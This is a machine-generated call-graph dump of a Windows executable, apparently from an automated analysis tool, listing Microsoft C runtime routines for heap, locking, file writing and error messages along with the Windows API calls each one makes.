__FF_MSGBANNER 58 API calls 6180->6181 6181->6179 6183 e11739 6182->6183 6184 e117b8 __mtinitlocknum 3 API calls 6183->6184 6185 e11743 6184->6185 6185->6065 6187 e11a85 __FF_MSGBANNER 58 API calls 6186->6187 6188 e117d6 6187->6188 6189 e11ae2 __NMSG_WRITE 58 API calls 6188->6189 6190 e117de 6189->6190 7274 e1188c 6190->7274 6194 e11942 _doexit 58 API calls 6193->6194 6195 e11a80 6194->6195 6195->6092 6197 e11942 _doexit 58 API calls 6196->6197 6198 e11804 6197->6198 6198->6095 6240 e11777 6199->6240 6201 e118b1 __init_pointers __initp_misc_winsig 6241 e149a5 EncodePointer 6201->6241 6203 e118c9 __init_pointers 6204 e14120 34 API calls 6203->6204 6204->6101 6208 e1457c 6205->6208 6206 e1382f 6206->6104 6218 e14011 6206->6218 6208->6206 6242 e140b2 6208->6242 6210 e138a5 6209->6210 6212 e138ab 6209->6212 6245 e1402f 6210->6245 6213 e14489 DeleteCriticalSection 6212->6213 6214 e144a5 6212->6214 6248 e14841 6213->6248 6216 e13838 6214->6216 6217 e144b1 DeleteCriticalSection 6214->6217 6216->6068 6217->6214 6219 e13845 6218->6219 6220 e14028 TlsAlloc 6218->6220 6219->6104 6219->6109 6222 e14880 6221->6222 6224 e1385d 6222->6224 6226 e1489e 6222->6226 6274 e1750d 6222->6274 6224->6112 6227 e1406d 6224->6227 6226->6222 6226->6224 6282 e143b9 Sleep 6226->6282 6228 e14083 6227->6228 6229 e14087 TlsSetValue 6227->6229 6228->6115 6229->6115 6231 e1377e __commit 6230->6231 6285 e1443f 6231->6285 6233 e137bb 6292 e13813 6233->6292 6236 e1443f __lock 58 API calls 6237 e137dc ___addlocaleref 6236->6237 6295 e1381c 6237->6295 6239 e13807 __commit 6239->6119 6240->6201 6241->6203 6243 e140c2 6242->6243 6244 e140cf InitializeCriticalSectionAndSpinCount 6242->6244 6243->6208 6244->6208 6246 e14042 6245->6246 6247 e14046 TlsFree 6245->6247 6246->6212 6247->6212 6249 e14873 __dosmaperr 6248->6249 6250 e1484a HeapFree 6248->6250 6249->6212 6250->6249 6251 e1485f 6250->6251 6254 e11cd3 6251->6254 6257 e13703 GetLastError 6254->6257 6256 e11cd8 GetLastError 6256->6249 6271 e1404e 6257->6271 6259 e13766 SetLastError 6259->6256 6260 e13718 6260->6259 6261 e14879 __calloc_crt 55 API calls 6260->6261 6262 e1372b 6261->6262 6262->6259 6263 e1406d __getptd_noexit TlsSetValue 6262->6263 6264 e1373f 6263->6264 6265 e13745 6264->6265 6266 e1375d 6264->6266 6267 e13772 __initptd 55 API calls 6265->6267 6268 e14841 _free 55 API calls 6266->6268 6270 e1374d GetCurrentThreadId 6267->6270 6269 e13763 6268->6269 6269->6259 6270->6259 6272 e14065 TlsGetValue 6271->6272 6273 e14061 6271->6273 6272->6260 6273->6260 6275 e17518 6274->6275 6277 e17533 6274->6277 6276 e17524 6275->6276 6275->6277 6278 e11cd3 __cftoe_l 57 API calls 6276->6278 6279 e17543 HeapAlloc 6277->6279 6280 e17529 6277->6280 6283 e11751 DecodePointer 6277->6283 6278->6280 6279->6277 6279->6280 6280->6222 6282->6226 6284 e11764 6283->6284 6284->6277 6286 e14450 6285->6286 6287 e14463 EnterCriticalSection 6285->6287 6298 e144c7 6286->6298 6287->6233 6289 e14456 6289->6287 6290 e117ce __lock 57 API calls 6289->6290 6291 e14462 6290->6291 6291->6287 6492 e145a9 LeaveCriticalSection 6292->6492 6294 e137d5 6294->6236 6493 e145a9 LeaveCriticalSection 6295->6493 6297 e13823 6297->6239 6299 e144d3 __commit 6298->6299 6300 e144f4 6299->6300 6301 e144dc 6299->6301 6310 e14515 __commit 6300->6310 6364 e148c1 6300->6364 6322 e11a85 6301->6322 6308 e14510 6312 e11cd3 __cftoe_l 58 API calls 6308->6312 6309 e1451f 6313 e1443f __lock 58 API calls 6309->6313 6310->6289 6312->6310 6314 e14526 6313->6314 6316 e14533 6314->6316 6317 e1454b 6314->6317 6318 e140b2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 6316->6318 6319 e14841 _free 58 API calls 6317->6319 6320 e1453f 6318->6320 6319->6320 6370 e14567 6320->6370 6373 e13e98 6322->6373 6324 e11a8c 6325 e11a99 6324->6325 6326 e13e98 __NMSG_WRITE 58 API calls 6324->6326 6327 e11ae2 __NMSG_WRITE 58 API calls 6325->6327 6329 e11abb 6325->6329 6326->6325 6328 e11ab1 6327->6328 6330 e11ae2 __NMSG_WRITE 58 API calls 6328->6330 6331 e11ae2 6329->6331 6330->6329 6332 e11b00 __NMSG_WRITE 6331->6332 6334 e13e98 __NMSG_WRITE 55 API calls 6332->6334 6360 e11c27 6332->6360 6336 e11b13 6334->6336 6335 e11c90 6361 e117b8 6335->6361 6337 e11c2c GetStdHandle 6336->6337 6338 e13e98 __NMSG_WRITE 55 API calls 6336->6338 6341 e11c3a _strlen 6337->6341 6337->6360 6339 e11b24 6338->6339 6339->6337 6340 e11b36 6339->6340 6340->6360 6403 e15467 6340->6403 6344 e11c73 WriteFile 6341->6344 6341->6360 6344->6360 6345 e11b63 GetModuleFileNameW 6347 e11b83 6345->6347 6351 e11b93 __NMSG_WRITE 6345->6351 6346 e11c94 6348 e11ea9 __invoke_watson 8 API calls 6346->6348 6349 e15467 __NMSG_WRITE 55 API calls 6347->6349 6350 e11c9e 6348->6350 6349->6351 6351->6346 6356 e11bd9 6351->6356 6412 e154dc 6351->6412 6355 e153fb __NMSG_WRITE 55 API calls 6357 e11c10 6355->6357 6356->6346 6421 e153fb 6356->6421 6357->6346 6358 e11c17 6357->6358 6430 e1559a EncodePointer 6358->6430 6455 e15780 6360->6455 6470 e11784 GetModuleHandleExW 6361->6470 6367 e148cf 6364->6367 6366 e14509 6366->6308 6366->6309 6367->6366 6369 e148e2 6367->6369 6473 e11151 6367->6473 6369->6366 6369->6367 6490 e143b9 Sleep 6369->6490 6491 e145a9 LeaveCriticalSection 6370->6491 6372 e1456e 6372->6310 6374 e13ea2 6373->6374 6375 e11cd3 __cftoe_l 58 API calls 6374->6375 6376 e13eac 6374->6376 6377 e13ec8 6375->6377 6376->6324 6380 e11e99 6377->6380 6383 e11e6e DecodePointer 6380->6383 6384 e11e81 6383->6384 6389 e11ea9 IsProcessorFeaturePresent 6384->6389 6387 e11e6e __cftoe_l 8 API calls 6388 e11ea5 6387->6388 6388->6324 6390 e11eb4 6389->6390 6395 e11d3c 6390->6395 6394 e11e98 6394->6387 6396 e11d56 _memset ___raise_securityfailure 6395->6396 6397 e11d76 IsDebuggerPresent 6396->6397 6398 e143dc ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter 6397->6398 6399 e11e3a ___raise_securityfailure 6398->6399 6400 e15780 __cftoe_l 6 API calls 6399->6400 6401 e11e5d 6400->6401 6402 e143c7 GetCurrentProcess TerminateProcess 6401->6402 6402->6394 6404 e15472 6403->6404 6405 e15480 6403->6405 6404->6405 6410 e15499 6404->6410 6406 e11cd3 __cftoe_l 58 API calls 6405->6406 6407 e1548a 6406->6407 6408 e11e99 __cftoe_l 9 API calls 6407->6408 6409 e11b56 6408->6409 6409->6345 6409->6346 6410->6409 6411 e11cd3 __cftoe_l 58 API calls 6410->6411 6411->6407 6413 e154ea 6412->6413 6415 e154f3 6413->6415 6417 e154ee 6413->6417 6419 e1552d 6413->6419 6414 e11cd3 __cftoe_l 58 API calls 6416 e1551e 6414->6416 6415->6356 6418 e11e99 __cftoe_l 9 API calls 6416->6418 6417->6414 6417->6415 6418->6415 6419->6415 6420 e11cd3 __cftoe_l 58 API calls 6419->6420 6420->6416 6422 e15415 6421->6422 6424 e15407 6421->6424 6423 e11cd3 __cftoe_l 58 API calls 6422->6423 6429 e1541f 6423->6429 6424->6422 6427 e15441 6424->6427 6425 e11e99 __cftoe_l 9 API calls 6426 e11bf9 6425->6426 6426->6346 6426->6355 6427->6426 6428 e11cd3 __cftoe_l 58 API calls 6427->6428 6428->6429 6429->6425 6431 e155ce ___crtIsPackagedApp 6430->6431 6432 e1568d IsDebuggerPresent 6431->6432 6433 e155dd LoadLibraryExW 6431->6433 6436 e156b2 6432->6436 6437 e15697 6432->6437 6434 e155f4 GetLastError 6433->6434 6435 e1561a GetProcAddress 6433->6435 6440 e15603 LoadLibraryExW 6434->6440 6445 e156aa 6434->6445 6441 e1562e 7 API calls 6435->6441 6435->6445 6438 e156a5 6436->6438 6439 e156b7 DecodePointer 6436->6439 6437->6438 6442 e1569e OutputDebugStringW 6437->6442 6438->6445 6446 e156de DecodePointer DecodePointer 6438->6446 6453 e156f6 6438->6453 6439->6445 6440->6435 6440->6445 6443 e15676 GetProcAddress EncodePointer 6441->6443 6444 e1568a 6441->6444 6442->6438 6443->6444 6444->6432 6449 e15780 __cftoe_l 6 API calls 6445->6449 6446->6453 6447 e1571a DecodePointer 6447->6445 6448 e1572e DecodePointer 6448->6447 6450 e15735 6448->6450 6451 e1577c 6449->6451 6450->6447 6454 e15746 DecodePointer 6450->6454 6451->6360 6453->6447 6453->6448 6454->6447 6456 e15788 6455->6456 6457 e1578a IsProcessorFeaturePresent 6455->6457 6456->6335 6459 e17af6 6457->6459 6462 e17aa5 IsDebuggerPresent 6459->6462 6463 e17aba ___raise_securityfailure 6462->6463 6468 e143dc SetUnhandledExceptionFilter UnhandledExceptionFilter 6463->6468 6466 e17adf 6466->6335 6467 e17ac2 ___raise_securityfailure 6469 e143c7 GetCurrentProcess TerminateProcess 6467->6469 6468->6467 6469->6466 6471 e117af ExitProcess 6470->6471 6472 e1179d GetProcAddress 6470->6472 6472->6471 6474 e111cc 6473->6474 6485 e1115d 6473->6485 6475 e11751 _malloc DecodePointer 6474->6475 6476 e111d2 6475->6476 6477 e11cd3 __cftoe_l 57 API calls 6476->6477 6489 e111c4 6477->6489 6478 e11a85 __FF_MSGBANNER 57 API calls 6487 e11168 6478->6487 6479 e11190 RtlAllocateHeap 6479->6485 6479->6489 6480 e11ae2 __NMSG_WRITE 57 API calls 6480->6487 6481 e111b8 6483 e11cd3 __cftoe_l 57 API calls 6481->6483 6482 e11751 _malloc DecodePointer 6482->6485 6486 e111b6 6483->6486 6484 e117b8 __mtinitlocknum 3 API calls 6484->6487 6485->6479 6485->6481 6485->6482 6485->6486 6485->6487 6488 e11cd3 __cftoe_l 57 API calls 6486->6488 6487->6478 6487->6480 6487->6484 6487->6485 6488->6489 6489->6367 6490->6369 6491->6372 6492->6294 6493->6297 6497 e145a9 LeaveCriticalSection 6494->6497 6496 e13b6a 6496->6127 6497->6496 6499 e14955 EncodePointer 6498->6499 6499->6499 6500 e1496f 6499->6500 6500->6166 6504 e14730 6501->6504 6503 e14837 6503->6168 6505 e1473c __commit 6504->6505 6512 e11930 6505->6512 6511 e14763 __commit 6511->6503 6513 e1443f __lock 58 API calls 6512->6513 6514 e11937 6513->6514 6515 e14774 DecodePointer DecodePointer 6514->6515 6516 e147a1 6515->6516 6517 e14751 6515->6517 6516->6517 6529 e17431 6516->6529 6526 e1476e 6517->6526 6519 e14804 EncodePointer EncodePointer 6519->6517 6520 e147b3 6520->6519 6521 e147d8 6520->6521 6536 e14908 6520->6536 6521->6517 6523 e14908 __realloc_crt 61 API calls 6521->6523 6525 e147f2 EncodePointer 6521->6525 6524 e147ec 6523->6524 6524->6517 6524->6525 6525->6519 6563 e11939 6526->6563 6530 e1743a 6529->6530 6531 e1744f HeapSize 6529->6531 6532 e11cd3 __cftoe_l 58 API calls 6530->6532 6531->6520 6533 e1743f 6532->6533 6534 e11e99 __cftoe_l 9 API calls 6533->6534 6535 e1744a 6534->6535 6535->6520 6538 e1490f 6536->6538 6539 e1494c 6538->6539 6541 e17462 6538->6541 6562 e143b9 Sleep 6538->6562 6539->6521 6542 e17476 6541->6542 6543 e1746b 6541->6543 6545 e1747e 6542->6545 6551 e1748b 6542->6551 6544 e11151 _malloc 58 API calls 6543->6544 6546 e17473 6544->6546 6547 e14841 _free 58 API calls 6545->6547 6546->6538 6561 e17486 __dosmaperr 6547->6561 6548 e174c3 6550 e11751 _malloc DecodePointer 6548->6550 6549 e17493 HeapReAlloc 6549->6551 6549->6561 6552 e174c9 6550->6552 6551->6548 6551->6549 6553 e174f3 6551->6553 6555 e11751 _malloc DecodePointer 6551->6555 6558 e174db 6551->6558 6554 e11cd3 __cftoe_l 58 API calls 6552->6554 6556 e11cd3 __cftoe_l 58 API calls 6553->6556 6554->6561 6555->6551 6557 e174f8 GetLastError 6556->6557 6557->6561 6559 e11cd3 __cftoe_l 58 API calls 6558->6559 6560 e174e0 GetLastError 6559->6560 6560->6561 6561->6538 6562->6538 6566 e145a9 LeaveCriticalSection 6563->6566 6565 e11940 6565->6511 6566->6565 6573 e111f8 6567->6573 6569 e11025 VirtualAlloc 6570 e11487 6569->6570 7089 e114a2 6570->7089 6572 e1149d 6572->6175 6575 e11204 __commit 6573->6575 6574 e11217 6576 e11cd3 __cftoe_l 58 API calls 6574->6576 6575->6574 6577 e11248 6575->6577 6578 e1121c 6576->6578 6592 e12044 6577->6592 6580 e11e99 __cftoe_l 9 API calls 6578->6580 6587 e11227 __commit @_EH4_CallFilterFunc@8 6580->6587 6581 e1124d 6582 e11263 6581->6582 6583 e11256 6581->6583 6585 e1128d 6582->6585 6586 e1126d 6582->6586 6584 e11cd3 __cftoe_l 58 API calls 6583->6584 6584->6587 6607 e12163 6585->6607 6588 e11cd3 __cftoe_l 58 API calls 6586->6588 6587->6569 6588->6587 6593 e12050 __commit 6592->6593 6594 e1443f __lock 58 API calls 6593->6594 6595 e1205e 6594->6595 6596 e120d9 6595->6596 6601 e144c7 __mtinitlocknum 58 API calls 6595->6601 6605 e120d2 6595->6605 6628 e11fad 6595->6628 6633 e12017 6595->6633 6597 e148c1 __malloc_crt 58 API calls 6596->6597 6599 e120e0 6597->6599 6600 e140b2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 6599->6600 6599->6605 6604 e12106 EnterCriticalSection 6600->6604 6601->6595 6603 e1214f __commit 6603->6581 6604->6605 6625 e1215a 6605->6625 6615 e12183 __wopenfile 6607->6615 6608 e1219d 6609 e11cd3 __cftoe_l 58 API calls 6608->6609 6610 e121a2 6609->6610 6611 e11e99 __cftoe_l 9 API calls 6610->6611 6613 e11298 6611->6613 6612 e123bb 6640 e1626f 6612->6640 6622 e112ba 6613->6622 6615->6608 6621 e12358 6615->6621 6643 e162c3 6615->6643 6618 e162c3 __wcsnicmp 60 API calls 6619 e12370 6618->6619 6620 e162c3 __wcsnicmp 60 API calls 6619->6620 6619->6621 6620->6621 6621->6608 6621->6612 7082 e11fdd 6622->7082 6624 e112c0 6624->6587 6638 e145a9 LeaveCriticalSection 6625->6638 6627 e12161 6627->6603 6629 e11fb8 6628->6629 6630 e11fce EnterCriticalSection 6628->6630 6631 e1443f __lock 58 API calls 6629->6631 6630->6595 6632 e11fc1 6631->6632 6632->6595 6634 e12025 6633->6634 6635 e12038 LeaveCriticalSection 6633->6635 6639 e145a9 LeaveCriticalSection 6634->6639 6635->6595 6637 e12035 6637->6595 6638->6627 6639->6637 6651 e15a53 6640->6651 6642 e16288 6642->6613 6644 e16361 6643->6644 6645 e162d5 6643->6645 6994 e16379 6644->6994 6647 e11cd3 __cftoe_l 58 API calls 6645->6647 6649 e12351 6645->6649 6648 e162ee 6647->6648 6650 e11e99 __cftoe_l 9 API calls 6648->6650 6649->6618 6649->6621 6650->6649 6654 e15a5f __commit 6651->6654 6652 e15a75 6653 e11cd3 __cftoe_l 58 API calls 6652->6653 6655 e15a7a 6653->6655 6654->6652 6656 e15aab 6654->6656 6657 e11e99 __cftoe_l 9 API calls 6655->6657 6662 e15b1c 6656->6662 6661 e15a84 __commit 6657->6661 6659 e15ac7 6736 e15af0 6659->6736 6661->6642 6663 e15b3c 6662->6663 6740 e18a29 6663->6740 6665 e11ea9 __invoke_watson 8 API calls 6666 e1626e 6665->6666 6669 e15a53 __wsopen_helper 103 API calls 6666->6669 6667 e15b58 6668 e15b92 6667->6668 6678 e15bb5 6667->6678 6711 e15c8f 6667->6711 6771 e11c9f 6668->6771 6671 e16288 6669->6671 6671->6659 6673 e11cd3 __cftoe_l 58 API calls 6674 e15ba4 6673->6674 6676 e11e99 __cftoe_l 9 API calls 6674->6676 6675 e15c73 6677 e11c9f __commit 58 API calls 6675->6677 6703 e15bae 6676->6703 6679 e15c78 6677->6679 6678->6675 6683 e15c51 6678->6683 6680 e11cd3 __cftoe_l 58 API calls 6679->6680 6681 e15c85 6680->6681 6682 e11e99 __cftoe_l 9 API calls 6681->6682 6682->6711 6747 e16d26 6683->6747 6685 e15d1f 6686 e15d29 6685->6686 6687 e15d4c 6685->6687 6688 e11c9f __commit 58 API calls 6686->6688 6765 e159cb 6687->6765 6691 e15d2e 6688->6691 6693 e11cd3 __cftoe_l 58 API calls 6691->6693 6692 e15dec GetFileType 6696 e15df7 GetLastError 6692->6696 6697 e15e39 6692->6697 6695 e15d38 6693->6695 6694 e15dba GetLastError 6774 e11cb2 6694->6774 6699 e11cd3 __cftoe_l 58 API calls 6695->6699 6700 e11cb2 __dosmaperr 58 API calls 6696->6700 6779 e16fbc 6697->6779 6699->6703 6704 e15e1e CloseHandle 6700->6704 6701 e159cb ___createFile 3 API calls 6706 e15daf 6701->6706 6702 e15ddf 6709 e11cd3 __cftoe_l 58 API calls 6702->6709 6703->6659 6704->6702 6705 e15e2c 6704->6705 6708 e11cd3 __cftoe_l 58 API calls 6705->6708 6706->6692 6706->6694 6710 e15e31 6708->6710 6709->6711 6710->6702 6711->6665 6712 e16012 6712->6711 6715 e161e5 CloseHandle 6712->6715 6717 e159cb ___createFile 3 API calls 6715->6717 6720 e1620c 6717->6720 6718 e11c9f __commit 58 API calls 6732 e15ed8 6718->6732 6719 e12a3a 70 API calls __read_nolock 6719->6732 6721 e16214 GetLastError 6720->6721 6722 e1609c 6720->6722 6723 e11cb2 __dosmaperr 58 API calls 6721->6723 6722->6711 6724 e16220 6723->6724 6871 e16ecf 6724->6871 6726 e15ee0 6726->6732 6797 e1898f 6726->6797 6812 e186fe 6726->6812 6730 e1608f 6733 e1898f __close_nolock 61 API calls 6730->6733 6731 e17064 60 API calls __lseeki64_nolock 6731->6732 6732->6712 6732->6719 6732->6726 6732->6730 6732->6731 6843 e17da9 6732->6843 6734 e16096 6733->6734 6735 e11cd3 __cftoe_l 58 API calls 6734->6735 6735->6722 6737 e15af6 6736->6737 6738 e15b1a 6736->6738 6993 e1703e LeaveCriticalSection 6737->6993 6738->6661 6741 e18a33 6740->6741 6742 e18a48 6740->6742 6743 e11cd3 __cftoe_l 58 API calls 6741->6743 6742->6667 6744 e18a38 6743->6744 6745 e11e99 __cftoe_l 9 API calls 6744->6745 6746 e18a43 6745->6746 6746->6667 6748 e16d32 __commit 6747->6748 6749 e144c7 __mtinitlocknum 58 API calls 6748->6749 6750 e16d43 6749->6750 6751 e1443f __lock 58 API calls 6750->6751 6752 e16d48 __commit 6750->6752 6761 e16d56 6751->6761 6752->6685 6753 e16ea4 6892 e16ec6 6753->6892 6755 e16e36 6756 e14879 __calloc_crt 58 API calls 6755->6756 6760 e16e3f 6756->6760 6757 e1443f __lock 58 API calls 6757->6761 6758 e16dd6 EnterCriticalSection 6759 e16de6 LeaveCriticalSection 6758->6759 6758->6761 6759->6761 6760->6753 6883 e16c98 6760->6883 6761->6753 6761->6755 6761->6757 6761->6758 6763 e140b2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 6761->6763 6880 e16dfe 6761->6880 6763->6761 6766 e159d6 ___crtIsPackagedApp 6765->6766 6767 e15a31 CreateFileW 6766->6767 6768 e159da GetModuleHandleW GetProcAddress 6766->6768 6770 e15a4f 6767->6770 6769 e159f7 6768->6769 6769->6770 6770->6692 6770->6694 6770->6701 6772 e13703 __getptd_noexit 58 API calls 6771->6772 6773 e11ca4 6772->6773 6773->6673 6775 e11c9f __commit 58 API calls 6774->6775 6776 e11cbb __dosmaperr 6775->6776 6777 e11cd3 __cftoe_l 58 API calls 6776->6777 6778 e11cce 6777->6778 6778->6702 6780 e17024 6779->6780 6781 e16fc8 6779->6781 6782 e11cd3 __cftoe_l 58 API calls 6780->6782 6781->6780 6786 e16fea 6781->6786 6783 e17029 6782->6783 6785 e11c9f __commit 58 API calls 6783->6785 6784 e15e57 6784->6712 6784->6732 6788 e17064 6784->6788 6785->6784 6786->6784 6787 e1700f SetStdHandle 6786->6787 6787->6784 6900 e16f55 6788->6900 6790 e17074 6791 e1708d SetFilePointerEx 6790->6791 6792 e1707c 6790->6792 6794 e170a5 GetLastError 6791->6794 6796 e15ec1 6791->6796 6793 e11cd3 __cftoe_l 58 API calls 6792->6793 6793->6796 6795 e11cb2 __dosmaperr 58 API calls 6794->6795 6795->6796 6796->6718 6796->6732 6798 e16f55 __commit 58 API calls 6797->6798 6800 e1899d 6798->6800 6799 e189f3 6802 e16ecf __free_osfhnd 59 API calls 6799->6802 6800->6799 6801 e189d1 6800->6801 6803 e16f55 __commit 58 API calls 6800->6803 6801->6799 6804 e16f55 __commit 58 API calls 6801->6804 6805 e189fb 6802->6805 6807 e189c8 6803->6807 6808 e189dd CloseHandle 6804->6808 6806 e18a1d 6805->6806 6809 e11cb2 __dosmaperr 58 API calls 6805->6809 6806->6726 6810 e16f55 __commit 58 API calls 6807->6810 6808->6799 6811 e189e9 GetLastError 6808->6811 6809->6806 6810->6801 6811->6799 6813 e17064 __lseeki64_nolock 60 API calls 6812->6813 6814 e1871b 6813->6814 6815 e18780 6814->6815 6817 e17064 __lseeki64_nolock 60 API calls 6814->6817 6816 e11cd3 __cftoe_l 58 API calls 6815->6816 6818 e1878b 6815->6818 6816->6818 6821 e18737 6817->6821 6818->6726 6819 e1881f 6824 e17064 __lseeki64_nolock 60 API calls 6819->6824 6840 e18885 6819->6840 6820 e18760 GetProcessHeap HeapAlloc 6822 e1877b 6820->6822 6829 e18794 __setmode_nolock 6820->6829 6821->6815 6821->6819 6821->6820 6825 e11cd3 __cftoe_l 58 API calls 6822->6825 6823 e17064 __lseeki64_nolock 60 API calls 6823->6815 6826 e18837 6824->6826 6825->6815 6826->6815 6827 e16f55 __commit 58 API calls 6826->6827 6828 e1884b SetEndOfFile 6827->6828 6830 e1886b 6828->6830 6828->6840 6833 e187e5 6829->6833 6835 e187f4 __setmode_nolock 6829->6835 6913 e17e99 6829->6913 6832 e11cd3 __cftoe_l 58 API calls 6830->6832 6834 e18870 6832->6834 6836 e11c9f __commit 58 API calls 6833->6836 6837 e11c9f __commit 58 API calls 6834->6837 6841 e18809 GetProcessHeap HeapFree 6835->6841 6838 e187ea 6836->6838 6839 e1887b GetLastError 6837->6839 6838->6835 6842 e11cd3 __cftoe_l 58 API calls 6838->6842 6839->6840 6840->6815 6840->6823 6841->6840 6842->6835 6844 e17db5 __commit 6843->6844 6845 e17dc2 6844->6845 6846 e17dd9 6844->6846 6847 e11c9f __commit 58 API calls 6845->6847 6848 e17e78 6846->6848 6850 e17ded 6846->6850 6849 e17dc7 6847->6849 6851 e11c9f __commit 58 API calls 6848->6851 6852 e11cd3 __cftoe_l 58 API calls 6849->6852 6853 e17e15 6850->6853 6854 e17e0b 6850->6854 6855 e17e10 6851->6855 6865 e17dce __commit 6852->6865 6857 e16c98 ___lock_fhandle 59 API calls 6853->6857 6856 e11c9f __commit 58 API calls 6854->6856 6859 e11cd3 __cftoe_l 58 API calls 6855->6859 6856->6855 6858 e17e1b 6857->6858 6860 e17e41 6858->6860 6861 e17e2e 6858->6861 6862 e17e84 6859->6862 6866 e11cd3 __cftoe_l 58 API calls 6860->6866 6863 e17e99 __write_nolock 76 API calls 6861->6863 6864 e11e99 __cftoe_l 9 API calls 6862->6864 6867 e17e3a 6863->6867 6864->6865 6865->6732 6868 e17e46 6866->6868 6989 e17e70 6867->6989 6869 e11c9f __commit 58 API calls 6868->6869 6869->6867 6872 e16f3b 6871->6872 6873 e16edb 6871->6873 6874 e11cd3 __cftoe_l 58 API calls 6872->6874 6873->6872 6879 e16f04 6873->6879 6875 e16f40 6874->6875 6876 e11c9f __commit 58 API calls 6875->6876 6877 e16f2c 6876->6877 6877->6722 6878 e16f26 SetStdHandle 6878->6877 6879->6877 6879->6878 6895 e145a9 LeaveCriticalSection 6880->6895 6882 e16e05 6882->6761 6884 e16ca4 __commit 6883->6884 6885 e16cf3 EnterCriticalSection 6884->6885 6886 e1443f __lock 58 API calls 6884->6886 6887 e16d19 __commit 6885->6887 6888 e16cc9 6886->6888 6887->6753 6889 e140b2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 6888->6889 6891 e16ce1 6888->6891 6889->6891 6896 e16d1d 6891->6896 6899 e145a9 LeaveCriticalSection 6892->6899 6894 e16ecd 6894->6752 6895->6882 6897 e145a9 _doexit LeaveCriticalSection 6896->6897 6898 e16d24 6897->6898 6898->6885 6899->6894 6901 e16f60 6900->6901 6902 e16f75 6900->6902 6903 e11c9f __commit 58 API calls 6901->6903 6905 e11c9f __commit 58 API calls 6902->6905 6907 e16f9a 6902->6907 6904 e16f65 6903->6904 6906 e11cd3 __cftoe_l 58 API calls 6904->6906 6908 e16fa4 6905->6908 6909 e16f6d 6906->6909 6907->6790 6910 e11cd3 __cftoe_l 58 API calls 6908->6910 6909->6790 6911 e16fac 6910->6911 6912 e11e99 __cftoe_l 9 API calls 6911->6912 6912->6909 6914 e17ea6 __write_nolock 6913->6914 6915 e17ee5 6914->6915 6916 e17f04 6914->6916 6947 e17eda 6914->6947 6918 e11c9f __commit 58 API calls 6915->6918 6919 e17f40 6916->6919 6920 e17f5c 6916->6920 6917 e15780 __cftoe_l 6 API calls 6921 e186fa 6917->6921 6922 e17eea 6918->6922 6923 e11c9f __commit 58 API calls 6919->6923 6925 e17f75 6920->6925 6928 e17064 __lseeki64_nolock 60 API calls 6920->6928 6921->6829 6924 e11cd3 __cftoe_l 58 API calls 6922->6924 6926 e17f45 6923->6926 6927 e17ef1 6924->6927 6972 e16c44 6925->6972 6930 e11cd3 __cftoe_l 58 API calls 6926->6930 6931 e11e99 __cftoe_l 9 API calls 6927->6931 6928->6925 6933 e17f4c 6930->6933 6931->6947 6932 e17f83 6934 e182dc 6932->6934 6981 e136eb 6932->6981 6937 e11e99 __cftoe_l 9 API calls 6933->6937 6935 e182fa 6934->6935 6936 e1866f WriteFile 6934->6936 6939 e1841e 6935->6939 6945 e18310 6935->6945 6940 e182cf GetLastError 6936->6940 6949 e1829c 6936->6949 6937->6947 6951 e18429 6939->6951 6965 e18513 6939->6965 6940->6949 6942 e186a8 6942->6947 6948 e11cd3 __cftoe_l 58 API calls 6942->6948 6943 e17fee 6943->6934 6944 e17ffe GetConsoleCP 6943->6944 6944->6942 6967 e1802d 6944->6967 6945->6942 6946 e1837f WriteFile 6945->6946 6945->6949 6946->6940 6946->6945 6947->6917 6952 e186d6 6948->6952 6949->6942 6949->6947 6950 e183fc 6949->6950 6953 e18407 6950->6953 6954 e1869f 6950->6954 6951->6942 6951->6949 6956 e1848e WriteFile 6951->6956 6957 e11c9f __commit 58 API calls 6952->6957 6958 e11cd3 __cftoe_l 58 API calls 6953->6958 6959 e11cb2 __dosmaperr 58 API calls 6954->6959 6955 e18588 WideCharToMultiByte 6955->6940 6955->6965 6956->6940 6956->6951 6957->6947 6960 e1840c 6958->6960 6959->6947 6962 e11c9f __commit 58 API calls 6960->6962 6961 e185d7 WriteFile 6964 e1862a GetLastError 6961->6964 6961->6965 6962->6947 6964->6965 6965->6942 6965->6949 6965->6955 6965->6961 6966 e192cb 60 API calls __write_nolock 6966->6967 6967->6940 6967->6949 6967->6966 6968 e18116 WideCharToMultiByte 6967->6968 6970 e192e3 WriteConsoleW CreateFileW __putwch_nolock 6967->6970 6971 e181ab WriteFile 6967->6971 6986 e191c5 6967->6986 6968->6949 6969 e18151 WriteFile 6968->6969 6969->6940 6969->6967 6970->6967 6971->6940 6971->6967 6973 e16c5c 6972->6973 6974 e16c4f 6972->6974 6976 e16c68 6973->6976 6977 e11cd3 __cftoe_l 58 API calls 6973->6977 6975 e11cd3 __cftoe_l 58 API calls 6974->6975 6978 e16c54 6975->6978 6976->6932 6979 e16c89 6977->6979 6978->6932 6980 e11e99 __cftoe_l 9 API calls 6979->6980 6980->6978 6982 e13703 __getptd_noexit 58 API calls 6981->6982 6983 e136f1 6982->6983 6984 e136fe GetConsoleMode 6983->6984 6985 e117ce __lock 58 API calls 6983->6985 6984->6934 6984->6943 6985->6984 6987 e1918b __isleadbyte_l 58 API calls 6986->6987 6988 e191d2 6987->6988 6988->6967 6992 e1703e LeaveCriticalSection 6989->6992 6991 e17e76 6991->6865 6992->6991 6993->6738 6995 e1638d 6994->6995 7003 e163a4 6994->7003 6996 e16394 6995->6996 6998 e163b5 6995->6998 6997 e11cd3 __cftoe_l 58 API calls 6996->6997 6999 e16399 6997->6999 7005 e14c0c 6998->7005 7001 e11e99 __cftoe_l 9 API calls 6999->7001 7001->7003 7002 e18b20 60 API calls __towlower_l 7004 e163c0 7002->7004 7003->6649 7004->7002 7004->7003 7006 e14c6a 7005->7006 7007 e14c1d 7005->7007 7006->7004 7008 e136eb __setmbcp 58 API calls 7007->7008 7009 e14c23 7008->7009 7010 e14c4a 7009->7010 7013 e17366 7009->7013 7010->7006 7028 e14f2d 7010->7028 7014 e17372 __commit 7013->7014 7015 e136eb __setmbcp 58 API calls 7014->7015 7016 e1737b 7015->7016 7017 e173aa 7016->7017 7018 e1738e 7016->7018 7019 e1443f __lock 58 API calls 7017->7019 7021 e136eb __setmbcp 58 API calls 7018->7021 7020 e173b1 7019->7020 7040 e173e6 7020->7040 7023 e17393 7021->7023 7026 e173a1 __commit 7023->7026 7027 e117ce __lock 58 API calls 7023->7027 7026->7010 